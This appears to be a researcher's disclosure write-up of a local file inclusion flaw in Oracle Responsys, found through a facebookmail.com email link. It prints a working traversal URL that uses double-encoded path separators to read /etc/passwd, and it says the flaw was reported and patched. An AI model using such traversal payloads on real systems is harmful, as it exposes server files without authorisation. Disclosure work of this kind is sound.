How I Uncovered a Critical LFI Vulnerability in Oracle Responsys Cloud Service

Today I demonstrate how I discovered a local file inclusion (LFI) vulnerability in Oracle Responsys cloud service, which is used by many enterprises such as Facebook, LinkedIn, and Dropbox.

Responsys, originally a leading B2C cloud‑marketing software provider, was acquired by Oracle in 2013 and now integrates with Oracle's suite of cloud services.

Responsys assigns each client a private IP for accessing its cloud services.

Vulnerability Discovery

While reviewing emails from [email protected] , I noticed the domain em.facebookmail.com linked to Responsys. A DIG lookup confirmed the association.

The original email contained a link like:

http://em.facebookmail.com/pub/cc?_ri_=X0Gzc2X%3DWQpglLjHJlYQGkSIGbc52zaRY0i6zgzdzc6jpzcASTGzdzeRfAzbzgJyH0zfzbLVXtpKX%3DSRTRYRSY&_ei_=EolaGGF4SNMvxFF7KucKuWNhjeSKbKRsHLVV55xSq7EoplYQTaISpeSzfMJxPAX8oMMhFTpOYUvvmgn-WhyT6yBDeImov65NsCKxmYwyOL0.

Testing showed that the _ri_ parameter is not properly double‑URL‑encoded, allowing injection of arbitrary paths such as “%252fetc%252fpasswd”.

http://em.facebookmail.com/pub/sf/%252fetc%252fpasswd?_ri_=X0Gzc2X%3DYQpglLjHJlYQGrzdLoyD13pHoGgHNjCWGRBIk4d6Uw74cgmmfaDIiK4za7bf4aUdgSVXMtX%3DYQpglLjHJlYQGnnlO8Rp71zfzabzewzgLczg7Ulwbazahw8uszbNYzeazdMjhDzcmJizdNFCXgn&_ei_=Ep0e16vSBKEscHnsTNRZT2jxEz5WyG1Wpm_OvAU-aJZRZ_wzYDw97ETX_iSmseE

This directory‑traversal injection exposes server files, indicating insufficient input validation.

Broader Impact

Similar LFI issues were found on other companies using Responsys, such as LinkedIn, as shown in screenshots.

The vulnerability can leak sensitive information or allow full server compromise, posing a serious risk to all Responsys customers.

I reported the issue to Oracle, and it was patched within a week.